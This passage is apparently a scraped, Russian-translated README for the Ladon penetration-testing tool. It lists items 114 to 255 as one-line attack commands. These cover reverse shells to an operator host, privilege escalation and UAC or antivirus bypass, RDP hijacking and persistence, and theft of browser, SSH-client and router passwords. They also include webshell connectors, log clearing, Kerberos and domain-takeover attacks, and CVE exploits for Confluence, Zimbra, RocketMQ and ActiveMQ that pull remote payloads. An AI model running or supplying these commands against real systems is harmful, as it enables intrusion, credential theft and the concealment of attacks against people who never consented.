114 копировать токен и выполнить CMD (например, понижение прав system до текущего пользователя exploer)```Bash

Ladon GetSystem cmd.exe explorer

root@kitploit:~
##### 115 Runas Выполнение команд от имени пользователя```Bash
Ladon Runas user pass cmd
116 MS16135 повышение привилегий до SYSTEM```Bash

Ladon ms16135 whoami >=9.2.1版本移除 911保留

root@kitploit:~
##### 117 BadPotato повышение привилегий пользователя службы до SYSTEM```Bash
Ladon BadPotato cmdline
118 SweetPotato повышение привилегий пользователя службы до SYSTEM```Bash

Ladon SweetPotato cmdline

root@kitploit:~
##### 119 EfsPotato Win7-2019 повышение привилегий (повышение привилегий учетной записи службы до system)```Bash
Ladon EfsPotato whoami
120 Open3389 одним кликом открыть 3389```Bash

Ladon Open3389

root@kitploit:~
##### 121 Активация встроенного администратора Administrator```Bash
Ladon ActiveAdmin
122 Активировать встроенного пользователя Guest```Bash

Ladon ActiveGuest

root@kitploit:~
### Обратная оболочка

##### 123 Обратный TCP NC Shell```Bash
Ladon ReverseTcp 192.168.1.8 4444 nc
124 Обратный TCP MSF Shell```Bash

Ladon ReverseTcp 192.168.1.8 4444 shell

root@kitploit:~
##### 125 Обратный TCP MSF MET Shell```Bash
Ladon ReverseTcp 192.168.1.8 4444 meter
126 Обратный HTTP MSF MET Shell```Bash

Ladon ReverseHttp 192.168.1.8 4444

root@kitploit:~
##### 127 Обратный HTTPS MSF MET Shell```Bash
Ladon ReverseHttps 192.168.1.8 4444
128 Обратный TCP CMD & PowerShell Shell```Bash

Ladon PowerCat 192.168.1.8 4444 cmd Ladon PowerCat 192.168.1.8 4444 psh

root@kitploit:~
##### 129 Обратный UDP Cmd & PowerShell Shell```Bash
Ladon PowerCat 192.168.1.8 4444 cmd udp
Ladon PowerCat 192.168.1.8 4444 psh udp
130 netsh перенаправление порта 888 локального хоста на порт 22 112```Bash

Ladon netsh add 888 192.168.1.112 22

root@kitploit:~
##### 131  PortTran переадресация портов (пример 3389)```Bash
VPS监听: Ladon PortTran 8000 338
目标转发: Ladon PortTran 内网IP 3389 VPS_IP 8000
本机连接: mstsc VPS_IP:338

Локальное выполнение

132 захват сеанса RDP(без пароля)```Bash

Ladon RdpHijack 3 Ladon RdpHijack 3 console

root@kitploit:~
##### 133 Добавить автозагрузку через реестр```Bash
Ladon RegAuto Test c:\123.exe
134 выполнение AT запланированной задачи (без времени) (system права)```Bash

Ladon at c:\123.exe Ladon at c:\123.exe gui

root@kitploit:~
##### 135 SC служба добавление автозагрузки & выполнение программы (system привилегии)```Bash
Ladon sc c:\123.exe
Ladon sc c:\123.exe gui
Ladon sc c:\123.exe auto ServerName

Обнаружение системной информации

136 Протокол SNMP: обнаружение операционной системы, устройств и т.д.```Bash

Ladon 192.168.1.8/24 SnmpInfo

root@kitploit:~
##### 137  Обнаружение имени хоста Windows, домена и пользователя по протоколу NBT```Bash
Ladon 192.168.1.8/24 NbtInfo
138 Обнаружение версии Windows, имени хоста, домена по протоколу SMB```Bash

Ladon 192.168.1.8/24 SmbInfo

root@kitploit:~
##### 139  Обнаружение версии Windows, имени хоста и домена через протокол WMI```Bash
Ladon 192.168.1.8/24 WmiInfo
140 Обнаружение версии Windows, имени хоста и домена по протоколу Mssql```Bash

Ladon 192.168.1.8/24 MssqlInfo

root@kitploit:~
##### 141  Winrm протокол обнаружения версии Windows, имени хоста, домена```Bash
Ladon 192.168.1.8/24 WinrmInfo
142 Exchange обнаружение версии Windows, имени хоста, домена```Bash

Ladon 192.168.1.8/24 ExchangeInfo

root@kitploit:~
##### 143  Протокол RDP: обнаружение версии Windows, имени хоста, домена```Bash
Ladon 192.168.1.8/24 RdpInfo

Другие функции

144 Win2008 однокликовое включение .NET 3.5```Bash

Ladon EnableDotNet

root@kitploit:~
##### 145 Получить HTML-исходный код внутреннего сайта```Bash
Ladon gethtml http://192.168.1.1
146 Однокликовый мини WEB-сервер, специализированный для прослушивания при пентесте```Bash

Ladon web 80 Ladon web 80 dir

root@kitploit:~
获取外网IP (запустить WEB на VPS, цель обращается к ip.txt или ip.jpg)
http://192.168.1.8/ip.txt

##### 147 getstr/getb64/debase64/savetxt (результат вывода уязвимости без эха)
##### Прослушивание```Bash
Ladon web 800
Отправить и вернуть открытый текст```Bash

certutil.exe -urlcache -split -f http://192.168.1.8:800/getstr/test123456

root@kitploit:~
##### Результат Base64```Bash
certutil.exe -urlcache -split -f http://192.168.1.110:800/getbase64/k8gege520
Расшифровка результата Base64```Bash

certutil.exe -urlcache -split -fhttp://192.168.1.110:800/debase64/azhnZWdlNTIw

root@kitploit:~
##### 148 обнаружение плагинов Shiro```Bash
Ladon 192.168.1.8/24 IsShiro
149 LogDelTomcat удалить журналы Tomcat по указанному IP```Bash

Ladon LogDelTomcat access.log 192.168.1.8

root@kitploit:~
##### 150 Сканирование пользовательских сборок C# плагинов```Bash
Ladon 192.168.1.8/24 Poc.exe
Ladon 192.168.1.8/24 *.dll(c#)
151 ReadFile Чтение содержимого указанной длины из начала большого файла```Bash

Ladon ReadFile c:\k8.exe 默认1k Ladon ReadFile c:\k8.exe 1K Ladon ReadFile c:\k8.exe 1024K Ladon ReadFile c:\k8.exe 1M

root@kitploit:~
##### 152 Изменение реестра для чтения паролей в открытом виде в системах 2012 и новее```Bash
Ladon SetMzLogonPwd 1
153 Изменение подписи при захвате реестра```Bash

Ladon SetSignAuth 1

root@kitploit:~
##### 154 IP24 пакетное преобразование IP в формат ip24(192.168.1.1/24)```Bash
Ladon ip.txt IP24
155 IPC пакетное преобразование IP в формат IP C (192.168.1.)```Bash

Ladon ip.txt IPC

root@kitploit:~
##### 156 IPB  пакетное преобразование IP в формат IP B (192.168.)```Bash
Ladon ip.txt IPB
157 обнаружение уязвимостейAtlassian Confluence CVE-2022-26134```Bash

Ladon url.txt CVE-2022-26134

root@kitploit:~
##### 158 Atlassian Confluence CVE-2022-26134 EXP```Bash
Ladon EXP-2022-26134 https://111.123.123.123 id
159 RevShell-2022-26134 CVE-2022-26134 обратный шелл```Bash

Ladon RevShell-2022-26134 TargetURL VpsIP VpsPort Ladon RevShell-2022-26134 http://xxx.com:8090 123.123.123.123 4444

root@kitploit:~
##### 160 SslInfo Информация об обнаружении сертификатов устройств, IP, доменов, имен машин, организаций и т.д.```Bash
Ladon https://k8gege.org SslInfo
Ladon k8gege.org SslInfo
Ladon k8gege.org:443 SslInfo 指定端口
Ladon noping fbi.gov SslInfo 禁ping探测
Ladon 192.168.1.1 SslInfo
Ladon 192.168.1.1:8443 SslInfo
161 SslInfo массовое обнаружение информации об устройствах, IP, доменах, именах машин, организациях и т.д.```Bash

Ladon ip.txt SslInfo Ladon url.txt SslInfo Ladon 192.168.1.1/c SslInfo Ladon 192.168.1.1/b SslInfo

root@kitploit:~
##### 162 WPinfo - различные способы получения версий ядра WordPress, тем и плагинов```Bash
Ladon https://k8gege.org WPinfo
Ladon k8gege.org WPinfo
Ladon noping fbi.gov WPinfo 禁ping探测
Ladon 192.168.1.1 WPinfo
Ladon 192.168.1.1:8443 WPinfo
163 WPinfo Массовое получение версий основной программы WordPress, тем и плагинов```Bash

Ladon ip.txt WPinfo Ladon url.txt WPinfo Ladon 192.168.1.1/c WPinfo Ladon 192.168.1.1/b WPinfo

root@kitploit:~
##### 164  Брутфорс Exchange  Обнаружение взлома пароля Exchange```Bash
Ladon k8gege.org ExchangeScan
Ladon 192.168.1.8 ExchangeScan
Ladon 192.168.1.8、24 ExchangeScan
165 CVE-2022-27925 массовое обнаружение уязвимости RCE при обходе ZIP-каталогов на почтовом сервере Zimbra```Bash

Ladon 192.168.1.8 CVE-2022-27925 Ladon http://zimbra.k8gege.org CVE-2022-27925 Ladon ip.txt CVE-2022-27925 Ladon url.txt CVE-2022-27925 Ladon 192.168.1.1/c CVE-2022-27925 Ladon 192.168.1.1/b CVE-2022-27925

root@kitploit:~
##### 166 EXP-2022-27925 Zimbra почтовый сервер несанкционированная RCE уязвимость EXP GetShell```Bash
Ladon EXP-2022-27925 https://zimbra.k8gege.org poc.zip
167 WebShellCmd Подключение к jsp WebShell(поддерживает cd, k8, ua, uab64)```Bash

Ladon WebShell jsp ua https://zimbra.k8gege.org pass whoami

root@kitploit:~
##### JSP UAshell просмотр версии системы, python, gcc и другой информации для повышения привилегий```Bash
Ladon WebShell jsp ua https://zimbra.k8gege.org pass OSinfo
168 WebShellCmd Подключение к jsp WebShell (поддерживает cd, k8, ua, uab64)```Bash

Ladon WebShell jsp uab64 https://zimbra.k8gege.org pass whoami

root@kitploit:~
##### 169 Выполнение команд через неинтерактивный бэкдор IIS-Raid```Bash
Ladon IISdoor http://192.168.1.142 whoami
Ladon IISdoor http://192.168.1.142 SIMPLEPASS whoami
170 FindIP проверка наличия IP-диапазона в результатах уязвимостей```Bash

Ladon FindIP ipc.txt ISVUL.txt (精确搜索) Ladon FindIP ipc.txt ISVUL.txt like (模糊搜索)

root@kitploit:~
##### 171 CiscoPwd CVE-2019-1653 Cisco RV320 RV325 чтение паролей маршрутизатора```Bash
Ladon https://192.168.1.8 CiscoPwd
Ladon url.txt CiscoPwd 批量探测Cisco漏洞并导出用户密码
172 PrinterPoc Пакетное обнаружение уязвимости произвольного выполнения кода в PJL принтерах```Bash

Ladon 192.168.1.8 PrinterPoc Ladon ip.txt PrinterPoc 禁ping机器扫描使用noping Ladon noping 192.168.1.8 PrinterPoc Ladon noping ip.txt PrinterPoc

root@kitploit:~
##### 173 Поиск производителя по Mac (Ladon Mac MAC-адрес)```Bash
Ladon Mac ff-ff-ff-ff-ff-ff
Ladon Mac 01:00:5e:00:00:16
Ladon Mac ff5e00885d66
174 Взлом пароля маршрутизатора Cisco VPN (встроенные пароли по умолчанию, поддержка открытого текста и хешей)```Bash

Ladon 192.168.1.8/24 CiscoScan Ladon https://192.168.1.8 CiscoScan Ladon ip.txt CiscoScan Ladon url.txt CiscoScan​

root@kitploit:~
##### 175 vsFTPdPoc	CVE-2011-2523 vsftpd 2.3.4 обнаружение уязвимости бэкдора со смайликом  10.9 удалено```Bash
Ladon noping ip CVE-2011-2523
Ladon noping ip.txt vsFTPdPoc  
176 WpScan WordPress аудит паролей, слабые пароли```Bash

Ladon http://192.168.1.8 WpScan Ladon url.txt WpScan Ladon 192.168.1.8/24 WpScan http 扫描IP时添加http://

root@kitploit:~
##### 177  Обнаружение версии Exchange```Bash
Ladon https://192.168.1.8 ExchangeVer
Ladon 192.168.1.8/24 ExchangeVer
Ladon url.txt ExchangeVer
178 Обнаружение уязвимости RCE высокого риска в Exchange```Bash

Ladon https://192.168.1.8 ExchangePoc

root@kitploit:~
##### 179 Http/S получение заголовков ответа веб-страницы```Bash
Ladon https://192.168.1.8 GetHead
Ladon ip.txt GetHead
Ladon 192.168.1.8/24 GetHead http  扫描IP时添加http://
Ladon ip.txt GetHead https		   扫描IP时添加https://
180 Http/S получение информации заголовка ответа + исходный код веб-страницы```Bash

Ladon https://192.168.1.8 GetHtml Ladon ip.txt GetHtml Ladon 192.168.1.8/24 GetHtml http Ladon ip.txt GetHtml https 扫描IP时添加https://

root@kitploit:~
##### 181 Http/S получение доменных имен из веб-страниц```Bash
Ladon https://192.168.1.8 GetDomain
Ladon ip.txt GetDomain
Ladon 192.168.1.8/24 GetDomain http
Ladon ip.txt GetDomain https	扫描IP时添加https://
182 TrueIP обходит CDN для получения реального IP-адреса домена (доступные уникальные ключевые признаки: домен, заголовок, баннер и т.д.)```Bash

Ladon ip.txt TrueIP k8gege.org Ladon 192.168.1.8/24 TrueIP k8gege.org Ladon ip.txt TrueIP "K8哥哥" Ladon 192.168.1.8/24 TrueIP "K8哥哥"

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/placeholders/f0fc86cfe65f76d40e15aaec61704ec8220a56dc89d4be03c46f67cb31b9fa8c.svg)

##### 183 Чтение паролей, куки и истории Firefox```Bash
Ladon FirefoxPwd
Ladon FirefoxHistory
Ladon FirefoxCookie
184 BypassUAC11 без вывода поддерживает Win7, Win8, Win11, Win2012\2016\2019 и т.д. Версия 10.8 удалена```Bash

Ladon40 BypassUAC11 cmd Ladon40 BypassUAC11 c:\1.bat Ladon40 BypassUAC11 c:\1.exe

root@kitploit:~
##### 185 GetPwd поддерживает чтение паролей Navicat, TeamView, Xshell, SecureCRT```Bash
Ladon GetPwd
186 DraytekScan Аудит паролей и обнаружение слабых паролей Draytek```Bash

Ladon 192.168.1.8 DraytekScan Ladon https://192.168.1.8 DraytekScan Ladon 192.168.1.8/24 DraytekScan Ladon url.txt DraytekScan

root@kitploit:~
##### 187 XshellPwd Чтение паролей Xshell```Bash
Ladon XshellPwd
188 FortiGate CVE-2022-40684 неавторизованная запись SSH-KEY admin admin123```Bash

Ladon 192.168.1.8 CVE-2022-40684 Ladon https://192.168.1.8 CVE-2022-40684 Ladon 192.168.1.8/24 CVE-2022-40684 Ladon url.txt CVE-2022-40684

root@kitploit:~
##### 189 MssqlCmd  Удаленное выполнение команд SQL Server Версия SQL, информация об ОС xp_cmdshell```Bash
Ladon MssqlCmd 192.168.1.8 sa k8gege520 master info  
Ladon MssqlCmd 192.168.1.8 sa k8gege520 master open_cmdshell
Ladon MssqlCmd 192.168.1.8 sa k8gege520 master xp_cmdshell whoami
Ladon MssqlCmd 192.168.1.8 sa k8gege520 master r_shell whoami
Ladon MssqlCmd 192.168.1.8 sa k8gege520 master ws_shell whoami
Ladon MssqlCmd 192.168.1.8 sa k8gege520 master py_cmdshell whoami
190 MssqlCmd SQL Server удаленное выполнение команд efspotato, badpotato повышение привилегий```Bash

Ladon MssqlCmd 192.168.1.8 sa k8gege520 master install_clr Ladon MssqlCmd 192.168.1.8 sa k8gege520 master uninstall_clr Ladon MssqlCmd 192.168.1.8 sa k8gege520 master clr_exec whoami Ladon MssqlCmd 192.168.1.8 sa k8gege520 master clr_efspotato whoami Ladon MssqlCmd 192.168.1.8 sa k8gege520 master clr_badpotato whoami

root@kitploit:~
##### 191 CVE-2018-14847 Mikrotik RouterOS 6.29-6.42 версии чтение пароля```Bash
Ladon 192.168.1.8 CVE-2018-14847
Ladon ip.txt CVE-2018-14847
192 ZteScan Обнаружение пароля по умолчанию для веб-интерфейса роутеров и оптических модемов ZTE```Bash

Ladon 192.168.1.8 ZteScan Ladon ip.txt ZteScan Ladon http://192.168.1.8 ZteScan Ladon url.txt ZteScan

root@kitploit:~
##### 193 MSNSwitchPwd CVE-2022-32429 чтение пароля маршрутизатора MSNSwitch```Bash
Ladon https://192.168.1.8 MSNSwitchPwd
Ladon url.txt MSNSwitchPwd
194 NetGearPwd Чтение пароля маршрутизатора NetGear DGND3700v2```Bash

Ladon https://192.168.1.8 NetGearPwd Ladon url.txt NetGearPwd

root@kitploit:~
##### 195 Обнаружение версии WebLogic с помощью протокола T3```Bash
Ladon 192.168.1.8/24 T3Info
Ladon 192.168.1.8:7001 T3Info
Ladon http://192.168.1.8:7001 T3Info

Однокнопочный пентест InfoScan AllScan PocScan ExpScan VerScan

image

196 InfoScan Множество модулей для обнаружения информации о системе```Bash

Ladon 192.168.1.8/24 InfoScan Ladon 192.168.1.8 InfoScan Ladon ip.txt InfoScan

root@kitploit:~
##### 197 VulScan PocScan множественное обнаружение удаленных уязвимостей```Bash
Ladon 192.168.1.8/24 VulScan
Ladon 192.168.1.8 PocScan
Ladon http://192.168.1.8 PocScan
198 ExpScan множественные эксплуатации уязвимостей для получения оболочки```Bash

Ladon 192.168.1.8/24 ExpScan Ladon 192.168.1.8 ExpScan Ladon http://192.168.1.8 ExpScan

root@kitploit:~
##### 199 JoomlaPwd CVE-2023-23752 неавторизованное чтение пароля базы данных веб-сайта```Bash
Ladon 192.168.1.8/24 JoomlaPwd
Ladon 192.168.1.8 JoomlaPwd
Ladon http://192.168.1.8 JoomlaPwd
Ladon url.txt JoomlaPwd
200 AllScan все модули```Bash

Ladon 192.168.1.8/24 AllScan Ladon 192.168.1.8 AllScan Ladon http://192.168.1.8 AllScan

root@kitploit:~
##### 201 Определение версии Citrix Gateway```Bash
Ladon https://192.168.1.8 CitrixVer
Ladon 192.168.1.8/24 CitrixVer
Ladon url.txt CitrixVer
202 Обнаружение версии VMware vCenter```Bash

Ladon https://192.168.1.8 VmwareVer Ladon 192.168.1.8/24 VmwareVer Ladon url.txt VcenterVer

root@kitploit:~
##### 203 Обход Defender для выполнения PowerShell```Bash
Ladon RunPS -f hello.ps1
Ladon RunPS -c "echo test"
Ladon RunPS bypass
Ladon RunPS default
204 Перезагрузка принтера HP по SNMP```Bash

Ladon HPreboot 192.168.1.8 Ladon HPreboot 192.168.1.8 public

root@kitploit:~
##### 205 Очистка журналов операций Отключение журналирования .NET```Bash
Ladon Clslog
206 Обнаружение активных хостов по протоколу ARP```Bash

Ladon 192.168.1.8 ArpInfo Ladon 192.168.1.8/24 ArpInfo

root@kitploit:~
##### 207 Мини-FTP-сервер, (поддерживает встроенные команды ftp в Windows/Linux для загрузки и скачивания файлов)```Bash
Ladon FtpServer 21
Ladon Ftp 2121
Ladon Ftp 2121 admin admin
208 Мониторинг отправляемых данных TCP, сохранение в TXT и HEX, например протоколы SMB, RDP, HTTP, SSH, LDAP, FTP и др.```Bash

Ladon Tcp 8080 Ladon TcpServer 80

root@kitploit:~
##### 209 Мониторинг отправки UDP-пакетов, сохранение в TXT и HEX, например, протоколов DNS, SNMP и т.д.```Bash
Ladon UdpServer 8080
Ladon Udp 161
210 PortForward переадресация портов, ретрансляция портов```Bash

Ladon PortForward Example: Ladon PortForward 338 192.168.1.8 3389 Test: mstsc 127.0.0.1 338

root@kitploit:~
##### 211 CVE-2022-36537	Server Backup Manager Обнаружение несанкционированной уязвимости RCE (Zookeeper)```Bash
Ladon https://192.168.1.8 CVE-2022-36537
Ladon 192.168.1.8/24 CVE-2022-36537
Ladon url.txt CVE-2022-36537

212 EXP-2022-36537 Zookeeper эксплойт для несанкционированного чтения файлов (по умолчанию /WEB-INF/web.xml)```Bash Ladon EXP-2022-36537 url Ladon EXP-2022-36537 url /WEB-INF/web.xml

root@kitploit:~
##### 213 Полностью отключить SMB, отключить порт 445, заблокировать 0day, горизонтальное перемещение, атаки ретрансляции и т.д.```Bash
Ladon CloseSMB
214 Отключение указанной службы```Bash

Ladon DisService Spooler Ladon DisableService Spooler

root@kitploit:~
##### 215 Остановить указанную службу```Bash
Ladon StopService Spooler
216 Разрешить порты Открытые порты```Bash

Ladon OpenTCP 445 Ladon OpenUDP 161

root@kitploit:~
##### 217 Заблокировать порт Перехват порта```Bash
Ladon CloseTCP  445
Ladon CloseUDP  161
218 RunToken - программа для копирования и выполнения токенов```Bash

Ladon RunToken explorer cmd.exe Ladon RunToken explorer c:\1.bat

root@kitploit:~
##### 219 RunSystem повышение привилегий: от администратора до SYSTEM```Bash
Ladon RunSystem cmd.exe
Ladon RunUser cmd.exe
Ladon RunSystem c:\1.exe
220 RunUser снижение привилегий: системные привилегии понижены до пользователя для выполнения программы```Bash

Ladon RunUser cmd.exe Ladon RunUser c:\1.exe

root@kitploit:~
##### 221 GodPotato повышение привилегий Win8-Win11 Win2012-Win2022```Bash
Ladon GodPotato whoami
222 Hikvision Аудит паролей```Bash

Ladon 192.168.1.8/24 HikvisionScan Ladon http://192.168.1.8:8080 HikvisionScan Ladon url.txt HikvisionScan

root@kitploit:~
##### 223 hikvision Хиквижн CVE-2017-7921обнаружение уязвимости```Bash
Ladon 192.168.1.8/24 HikvisionPoc
Ladon http://192.168.1.8:8080 HikvisionPoc
Ladon url.txt HikvisionPoc
224 hikvision Hikvision расшифровка конфигурационного файла```Bash

Ladon HikvisionDecode configurationFile

root@kitploit:~
##### 225 Ladon тестовая CmdShell```Bash
Ladon web 800 cmd
226 специализированная оболочка для тестирования подключений CmdShell```Bash

Ladon cmdshell http://192.168.50.2:888 cmd whoami 浏览器访问 http://192.168.1.8:800/shell?cmd=whoami

root@kitploit:~
##### 227 просмотр администраторов домена```Bash
Ladon QueryAdminDomain
228 Просмотр информации о домене```Bash

Ladon QueryDomain

root@kitploit:~
##### 229 Обнаружение маршрутизаторов MikroTik в одной подсети с помощью широковещательного протокола Mndp```Bash
Ladon MndpInfo
Ladon RouterOS
Ladon Mikrotik
230 Инструмент подключения PostShell, поддерживает отправку пользовательских HTTP-заголовков```Bash

Ladon PostShell Ladon PostShell POST http://192.168.50.18/post.jsp tom cmd whoami Ladon PostShell POST http://192.168.50.18/post.jsp tom b64cmd d2hvYW1p Ladon PostShell POST http://192.168.50.18/post.jsp tom base64 d2hvYW1p Ladon PostShell UA http://192.168.50.18/ua.jsp tom cmd whoami Ladon PostShell UA http://192.168.50.18/ua.jsp tom b64cmd d2hvYW1p Ladon PostShell UA http://192.168.50.18/ua.jsp tom base64 d2hvYW1p Ladon PostShell Cookie http://192.168.50.18/ck.jsp tom cmd whoami Ladon PostShell Cookie http://192.168.50.18/ck.jsp tom b64cmd d2hvYW1p Ladon PostShell Cookie http://192.168.50.18/ck.jsp tom base64 d2hvYW1p Ladon PostShell Referer http://192.168.50.18/re.jsp tom cmd whoami Ladon PostShell Referer http://192.168.50.18/re.jsp tom b64cmd d2hvYW1p Ladon PostShell Referer http://192.168.50.18/re.jsp tom base64 d2hvYW1p Ladon PostShell Destination http://192.168.50.18/re.jsp tom cmd whoami Ladon PostShell Destination http://192.168.50.18/re.jsp tom b64cmd d2hvYW1p Ladon PostShell Destination http://192.168.50.18/re.jsp tom base64 d2hvYW1p Ladon PostShell HttpBasic http://192.168.50.18/re.jsp tom cmd whoami Ladon PostShell HttpBasic http://192.168.50.18/re.jsp tom b64cmd d2hvYW1p Ladon PostShell HttpBasic http://192.168.50.18/re.jsp tom base64 d2hvYW1p

root@kitploit:~
##### 231 RunCmd/Cmd  Execute Cmd command / support b64cmd```Bash	
Ladon cmd whoami
Ladon b64cmd d2hvYW1p 
232 Просмотр IP-адреса администратора, одним нажатием чтение журналов успешного входа 4624```Bash

Ladon LoginLog Ladon EventLog

root@kitploit:~
##### 233 Apache RocketMQ CVE-2023-33246 эксплойт удаленного выполнения команд```Bash	
Ladon RocketMQexp <ip> 10911 <command>
Ladon RocketMQexp 192.168.1.8 10911 "wget http://192.168.1.8/isvul"
234 Ladon инструмент для обхода антивируса в один клик```Bash

Ladon BypassAV py xor anyNet.exe

root@kitploit:~
##### 235 Повышение привилегий до SYSTEM в Win11/2022```Bash	
Ladon McpPotato whoami
236 Преобразование EXE в HEX, запись файла через CMD-команду```Bash

Ladon Exe2Hex 1.exe

root@kitploit:~
##### 237 EXE в Base64, запись CMD-команды в файл```Bash	
Ladon Exe2B64 1.exe
238 ZimbraVer Обнаружение версии почтовой системы Zimbra```Bash

Ladon 192.168.1.8/24 ZimbraVer Ladon http://192.168.1.8:8080 ZimbraVer Ladon url.txt ZimbraVer

root@kitploit:~
##### 239 SharpGPO проникновение в домен, инструмент бокового перемещения через групповые политики```Bash	
Ladon SharpGPO

Ladon SharpGPO --Action GetOU
Ladon SharpGPO --Action GetOU --OUName "IT Support"

Ladon SharpGPO --Action NewOU --OUName "IT Support"
Ladon SharpGPO --Action NewOU --OUName "App Dev" --BaseDN "OU=IT Support,DC=testad,DC=com"

Ladon SharpGPO --Action MoveObject --SrcDN "CN=user01,CN=Users,DC=testad,DC=com" --DstDN "OU=IT Support,DC=testad,DC=com"
Ladon SharpGPO --Action MoveObject --SrcDN "CN=user01,OU=IT Support,DC=testad,DC=com" --DstDN "CN=Users,DC=testad,DC=com"

Ladon SharpGPO --Action RemoveOU --OUName "IT Support"
Ladon SharpGPO --Action RemoveOU --DN "OU=IT Support,DC=testad,DC=com"


Ladon SharpGPO --Action GetGPO
Ladon SharpGPO --Action GetGPO --GPOName testgpo

Ladon SharpGPO --Action NewGPO --GPOName testgpo

Ladon SharpGPO --Action RemoveGPO --GPOName testgpo
Ladon SharpGPO --Action RemoveGPO --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8

Ladon SharpGPO --Action GetGPLink
Ladon SharpGPO --Action GetGPLink --DN "OU=IT Support,DC=testad,DC=com"
Ladon SharpGPO --Action GetGPLink --GPOName testgpo
Ladon SharpGPO --Action GetGPLink --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8

Ladon SharpGPO --Action NewGPLink --DN "OU=IT Support,DC=testad,DC=com" --GPOName testgpo
Ladon SharpGPO --Action NewGPLink --DN "OU=IT Support,DC=testad,DC=com" --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8

Ladon SharpGPO --Action RemoveGPLink --DN "OU=IT Support,DC=testad,DC=com" --GPOName testgpo
Ladon SharpGPO --Action RemoveGPLink --DN "OU=IT Support,DC=testad,DC=com" --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8

Ladon SharpGPO --Action GetSecurityFiltering --GPOName testgpo
Ladon SharpGPO --Action GetSecurityFiltering --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8

Ladon SharpGPO --Action NewSecurityFiltering --GPOName testgpo --DomainUser Alice
Ladon SharpGPO --Action NewSecurityFiltering --GPOName testgpo --DomainGroup "Domain Users"
Ladon SharpGPO --Action NewSecurityFiltering --GPOName testgpo --DomainComputer WIN-SERVER
Ladon SharpGPO --Action NewSecurityFiltering --GPOName testgpo --NTAccount "Authenticated Users"
Ladon SharpGPO --Action NewSecurityFiltering --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8 --DomainUser Alice
Ladon SharpGPO --Action NewSecurityFiltering --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8 --DomainGroup "Domain Users"
Ladon SharpGPO --Action NewSecurityFiltering --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8 --DomainComputer WIN-SERVER
Ladon SharpGPO --Action NewSecurityFiltering --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8 --NTAccount "Authenticated Users"

Ladon SharpGPO --Action RemoveSecurityFiltering --GPOName testgpo --DomainUser Alice
Ladon SharpGPO --Action RemoveSecurityFiltering --GPOName testgpo --DomainGroup "Domain Users"
Ladon SharpGPO --Action RemoveSecurityFiltering --GPOName testgpo --DomainComputer WIN-SERVER
Ladon SharpGPO --Action RemoveSecurityFiltering --GPOName testgpo --NTAccount "Authenticated Users"
Ladon SharpGPO --Action RemoveSecurityFiltering --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8 --DomainUser Alice
Ladon SharpGPO --Action RemoveSecurityFiltering --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8 --DomainGroup "Domain Users"
Ladon SharpGPO --Action RemoveSecurityFiltering --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8 --DomainComputer WIN-SERVER
Ladon SharpGPO --Action RemoveSecurityFiltering --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8 --NTAccount "Authenticated Users"
240 Получение информации о сайте IIS одним щелчком```Bash

Ladon IisInfo

root@kitploit:~
##### 241 Специализированный WEB-сервер для пентеста: десериализация LDAP```Bash	
Ladon web 800 ldap=192.168.1.8:800
242 Десериализация RMI на специализированном веб-сервере для пентеста```Bash

Ladon web 800 rmi=192.168.1.8

root@kitploit:~
##### 243 API добавление администратора (игнорирует отключение net, net1 в системе)```Bash	
Ladon AddAdmin admin$ 123456
244 API добавление пользователя (игнорирование отключения системных net, net1.exe)```Bash

Ladon AddUser admin$ 123456

root@kitploit:~
##### 245 Удаление пользователя через API (игнорируя запрет системных net и net1.exe)```Bash	
Ladon DelUser admin$
246 Rubeus проникновение в домен Атаки Kerberos

Например: запрос TGT/запрос ST/AS-REP Roasting/Kerberoasting/атаки делегирования/Золотой билет/Серебряный билет/Алмазный билет/Сапфировый билет и т.д.```Bash Ladon Rubeus

root@kitploit:~
##### 247 noPac проникновение в домен, повышение привилегий в домене CVE-2021-42287/CVE-2021-42278```Bash	
CVE-2021-42287/CVE-2021-42278 Scanner & Exploiter

/domain /user /pass argument needed for scanning
/dc /mAccount /nPassword argument needed for exploitation

Examples:
  Ladon.exe noPac scan -domain htb.local -user domain_user -pass 'Password123!'
  Ladon.exe noPac -dc dc02.htb.local -mAccount demo -mPassword Password123!
  Ladon.exe noPac -domain htb.local -user domain_user -pass 'Password123!' /dc dc02.htb.local /mAccount demo /mPassword Password123!
  Ladon.exe noPac -domain htb.local -user domain_user -pass 'Password123!' /dc dc02.htb.local /mAccount demo123 /mPassword Password123! /service cifs /ptt
248 SharpGPOAbuse```Bash

Ladon SharpGPOAbuse

root@kitploit:~
##### 249 SharpSphere Взаимодействие с гостевой ОС виртуальных машин, управляемых vCenter, и выполнение команд```Bash	
Ladon SharpSphere

  No verb selected.

  dump        Snapshot and download memory dump file

  list        List all VMs managed by this vCenter

  execute     Execute given command in target VM

  c2          Run C2 using C3's VMwareShareFile module

  upload      Upload file to target VM

  download    Download file from target VM

  help        Display more information on a specific command.

  version     Display version information.
250 Удаленное выполнение команды Dcom через MMC20```Bash

Ladon MmcExec host cmdline Ladon MmcExec 127.0.0.1 calc Ladon MmcExec 127.0.0.1 Y2FsYw==

root@kitploit:~
##### 251 Dcom удаленное выполнение команд ShellWindows```Bash	
Ladon ShellExec host cmdline
Ladon ShellExec 127.0.0.1 calc
Ladon ShellExec 127.0.0.1 Y2FsYw==
252 Dcom удаленное выполнение команд через ShellBrowserWindow```Bash

Ladon ShellBrowserExec host cmdline Ladon ShellBrowserExec 127.0.0.1 calc Ladon ShellBrowserExec 127.0.0.1 Y2FsYw==

root@kitploit:~
##### 253 Smtp Ntlm обнаружение системной информации (25, 465, 587 порты)```Bash	
Ladon 192.168.1.8/24 SmtpInfo
254 HTTP/S Ntlm обнаружение системной информации```Bash

Ladon 192.168.1.8/24 HttpInfo

root@kitploit:~
##### 255 ActiveMQ CVE-2023-46604 RCE Exploit```Bash	
Ladon CVE-2023-46604 -i 192.168.1.8 -u http://192.168.1.1/poc.xml
